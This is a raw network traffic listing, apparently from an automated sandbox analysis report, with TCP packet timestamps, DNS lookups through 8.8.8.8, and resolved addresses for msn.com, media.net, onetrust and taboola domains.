                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.641911983 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.641917944 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.642683983 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.642735004 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.642782927 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.642806053 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.644706964 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.644747972 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.644794941 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.644823074 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.646697044 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.646740913 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.646785975 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.646814108 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.648726940 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.648767948 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.648792982 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.648833036 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.648854971 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.650767088 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.650811911 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.650861025 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.650886059 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.650980949 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.651281118 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.651351929 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.652798891 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.652839899 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.652894974 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.652920961 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.654782057 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.654824972 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.654872894 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.654898882 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.656829119 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.656867981 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.656924963 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.656949997 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.658859968 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.658910990 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.658956051 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.660190105 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.660882950 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.660928011 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.660969019 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.660995960 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.662923098 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.662965059 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.663081884 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.664974928 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665023088 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665060997 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665102005 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665143013 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665203094 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665216923 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.665221930 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.666997910 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.667043924 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.667174101 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.667215109 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.670603037 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.670639992 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.670753002 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.670794010 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.671401024 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.671436071 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.671515942 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.673253059 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.703713894 CEST44349731151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.713922977 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.713968039 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.713996887 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714027882 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714067936 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714126110 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714171886 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714427948 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714457035 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714519024 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.714559078 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.715924025 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.716339111 CEST44349733151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.716449976 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.716506004 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.716953993 CEST44349733151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.717048883 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.717176914 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.751491070 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.794514894 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.835961103 CEST44349733151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.842025042 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.043869972 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.043951988 CEST49731443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.044111967 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.044163942 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.044183969 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.044234037 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.054382086 CEST49718443192.168.2.5104.20.185.68
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.054461002 CEST49717443192.168.2.5104.20.185.68
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.135799885 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.135970116 CEST44349731151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136086941 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136173010 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136193991 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136254072 CEST44349731151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136313915 CEST49731443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136337996 CEST44349733151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136368036 CEST44349732151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136393070 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136396885 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136432886 CEST49732443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136467934 CEST44349733151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136488914 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136502028 CEST44349730151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136517048 CEST49733443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136528969 CEST44349731151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136558056 CEST49730443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136565924 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136584997 CEST49731443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136666059 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136734962 CEST44349729151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136781931 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.136805058 CEST49729443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.143865108 CEST44349718104.20.185.68192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.143940926 CEST49718443192.168.2.5104.20.185.68
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145145893 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145175934 CEST44349734151.101.1.44192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145226002 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145272970 CEST49734443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145852089 CEST44349717104.20.185.68192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:11.145920992 CEST49717443192.168.2.5104.20.185.68

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:06.853152990 CEST5430253192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:06.931437016 CEST53543028.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:07.293356895 CEST5378453192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:07.371453047 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.474884987 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.510626078 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.563318014 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.617285013 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.639204025 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:08.728451014 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:09.950673103 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:10.031573057 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:11.242796898 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:11.332218885 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:12.684879065 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:12.776889086 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:12.822679996 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:12.901310921 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:14.254791975 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:14.340315104 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:18.142723083 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:18.234879971 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.178316116 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.269494057 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.672830105 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.754440069 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:25.440519094 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:25.443903923 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:25.534259081 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:25.553040981 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:27.463612080 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:27.571476936 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.081526995 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.157212973 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.173083067 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.254259109 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:30.119290113 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:30.197269917 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:32.373809099 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:32.470789909 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.183538914 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.279548883 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.888500929 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.976839066 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.195209026 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:46.661828995 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:46.777815104 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:48.836270094 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:48.935359955 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:49.954780102 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:50.046844959 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:51.016690969 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:51.104202986 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:51.148963928 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:51.242062092 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:52.236937046 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:52.316184044 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:53.081224918 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:53.164315939 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:53.323658943 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:53.408441067 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:55.414788008 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:55.502923965 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:57.161127090 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:57.249583960 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:59.502918005 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:59.591192961 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:05.669840097 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:05.761953115 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:34.429079056 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:34.515584946 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:35.559000969 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:35.652646065 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:36.639759064 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:36.726258993 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:38.707513094 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:38.802409887 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:42.798038960 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:42.881448984 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:55.256458044 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:55.345890999 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:56.660123110 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:56.740128994 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:57.796849966 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:57.879863977 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:59.026540995 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:59.132791996 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:59.161250114 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:31:59.242307901 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:00.770824909 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:00.849904060 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:02.146202087 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                        Jun 3, 2021 20:32:02.233278036 CEST53594138.8.8.8192.168.2.5

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.672830105 CEST192.168.2.58.8.8.80x1491Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:27.463612080 CEST192.168.2.58.8.8.80xabcStandard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.081526995 CEST192.168.2.58.8.8.80xb8b7Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.157212973 CEST192.168.2.58.8.8.80x7341Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:30.119290113 CEST192.168.2.58.8.8.80xc1afStandard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:32.373809099 CEST192.168.2.58.8.8.80xc4e4Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.183538914 CEST192.168.2.58.8.8.80x4759Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.888500929 CEST192.168.2.58.8.8.80x6f6Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.195209026 CEST192.168.2.58.8.8.80x26dStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:24.754440069 CEST8.8.8.8192.168.2.50x1491No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:27.571476936 CEST8.8.8.8192.168.2.50xabcNo error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.173083067 CEST8.8.8.8192.168.2.50xb8b7No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.173083067 CEST8.8.8.8192.168.2.50xb8b7No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:28.254259109 CEST8.8.8.8192.168.2.50x7341No error (0)contextual.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:30.197269917 CEST8.8.8.8192.168.2.50xc1afNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:30.197269917 CEST8.8.8.8192.168.2.50xc1afNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:32.470789909 CEST8.8.8.8192.168.2.50xc4e4No error (0)lg3.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.279548883 CEST8.8.8.8192.168.2.50x4759No error (0)hblg.media.net23.57.80.37A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:33.976839066 CEST8.8.8.8192.168.2.50x6f6No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST8.8.8.8192.168.2.50x26dNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                        Jun 3, 2021 20:30:34.277721882 CEST8.8.8.8192.168.2.50x26dNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
